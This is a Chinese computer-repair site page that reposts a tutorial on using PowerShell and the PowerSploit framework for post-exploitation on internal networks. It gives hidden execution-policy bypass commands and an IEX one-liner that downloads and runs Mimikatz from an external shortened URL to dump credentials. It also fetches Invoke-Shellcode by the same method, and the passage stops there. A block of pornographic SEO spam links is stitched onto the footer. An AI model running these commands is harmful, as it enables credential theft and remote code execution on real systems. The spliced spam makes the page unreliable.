錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
[安全]解析在內網Powersploit滲透中的使用

作者: 佚名  日期:2017-04-14 07:35:07   來源: 本站整理

一.Powershell

我們先來說說powershell,PowerShell 是運行在 Windows上實現系統和應用程序管理自動化的命令行腳本環境。你可以把它看成是命令行提示符 cmd.exe 的擴充,或是顛覆。Powershell需要.NET環境的支持,同時支持.NET對象。其可讀性,易用性,可以位居當前所有 shell 之首。

這是別人說的,不過稍微研究下覺得,哇塞,這東西真的挺牛的,除了語法麻煩以外,剩下都挺好,不過語法麻煩讓我們這種英文不好的人怎么玩啊

當前 PowerShell 有五個版本,分別為 1.0,2.0,3.0,4.0,5.0

當時看別人的文章都說是有四個版本,但是我打開windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來看看他的基本命令:

 新建目錄 New-Item whitecellclub -ItemType Directory

 新建文件 New-Item light.txt -ItemType File

 刪除目錄 Remove-Item whitecellclub

 顯示文本內容 Get-Content light.txt

 設置文本內容 Set-Content light.txt -Value “i love light so much”

 追加內容 Add-Content light.txt -Value “but i love you more”

 清除內容 Clear-Content light.txt

看看吧,什么感覺,你還喜歡他么?

不過好在,微軟也想到了這個問題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說一下,我們怎么看我們powershell的版本,

Get-Host

這個是虛擬機的win7,所以是2.0的版本

powershell還有一些比較叼的用法:

本地權限繞過執行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隱藏權限繞過執行腳本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1

直接用IEX下載遠程的PS1腳本回來權限繞過執行

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"

我們可以來試一下:

這個命令是可以看到我們的版本的

完美繞過!(ps:這里說一下,ps1結尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因為我也不會寫這種腳本)

二. Powersploit

介紹完了,我們開始我們的正題吧 Powersploit在內網滲透中的使用

powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關模塊和功能。

github地址: https://github.com/mattifestation/PowerSploit

這里才是重點,我們開始吧:

首先,我在我本機上下載這個腳本文件

ps:我本機用的是ubuntu,所以我這里就用ubuntu代替kali的操作

下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠程下載,然后啟動apache

service apache2 start

然后我們訪問我們的127.0.0.1  保證我們可以訪問的到

他的目錄就跟metasploit一樣,分工明確

CodeExecution 在目標主機執行代碼

ScriptModification 在目標主機上創建或修改腳本

Persistence 后門腳本(持久性控制)

AntivirusBypass 發現殺軟查殺特征

Exfiltration 目標主機上的信息搜集工具

Mayhem 藍屏等破壞性腳本

Recon 以目標主機為跳板進行內網信息偵查

(1). Invoke-Shellcode

我們使用 Invoke-Shellcode

Invoke-Shellcode的作用:將shellcode插入您選擇的進程ID或本地PowerShell中。

Invoke-Shellcode配合上metasploit,可以達到意想不到的效果

現在主機上下載我們的腳本(當然,你也可以直接從github上去下載,也可以從我們本機下載)

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲AV无码精品色午夜果冻不卡 | 亚洲第一极品精品无码久久| 无码不卡亚洲成?人片| 久久无码人妻精品一区二区三区| 夜夜添无码一区二区三区| 亚洲人av高清无码| 久久精品岛国av一区二区无码| 丰满少妇被猛烈进入无码| 久久久久亚洲av无码专区蜜芽| 免费A级毛片无码A| 99精品人妻无码专区在线视频区 | 手机在线观看?v无码片| 无码人妻丰满熟妇精品区| 国产成人亚洲精品无码AV大片| 久久无码中文字幕东京热| 最新高清无码专区| 日韩精品无码免费专区午夜| 精品人妻中文无码AV在线| 亚洲av中文无码字幕色不卡| 亚洲中文字幕在线无码一区二区| 国产精品无码无卡在线播放| 无码少妇一区二区浪潮av| 无码国模国产在线观看免费| 亚洲av无码一区二区三区人妖| 无码国内精品久久人妻| 亚洲va无码va在线va天堂| 亚洲午夜AV无码专区在线播放| 日韩免费a级毛片无码a∨| 亚洲精品无码专区在线| 亚洲av无码成人精品区一本二本| 久久精品无码一区二区无码| 免费无码作爱视频| 一本加勒比HEZYO无码资源网| 亚洲热妇无码AV在线播放| 亚洲精品无码久久千人斩| 亚洲精品无码Av人在线观看国产| 亚洲欧洲无码AV电影在线观看| 亚洲日韩乱码中文无码蜜桃臀网站| 国产精品三级在线观看无码 | 久久国产精品无码网站| 国产综合无码一区二区三区|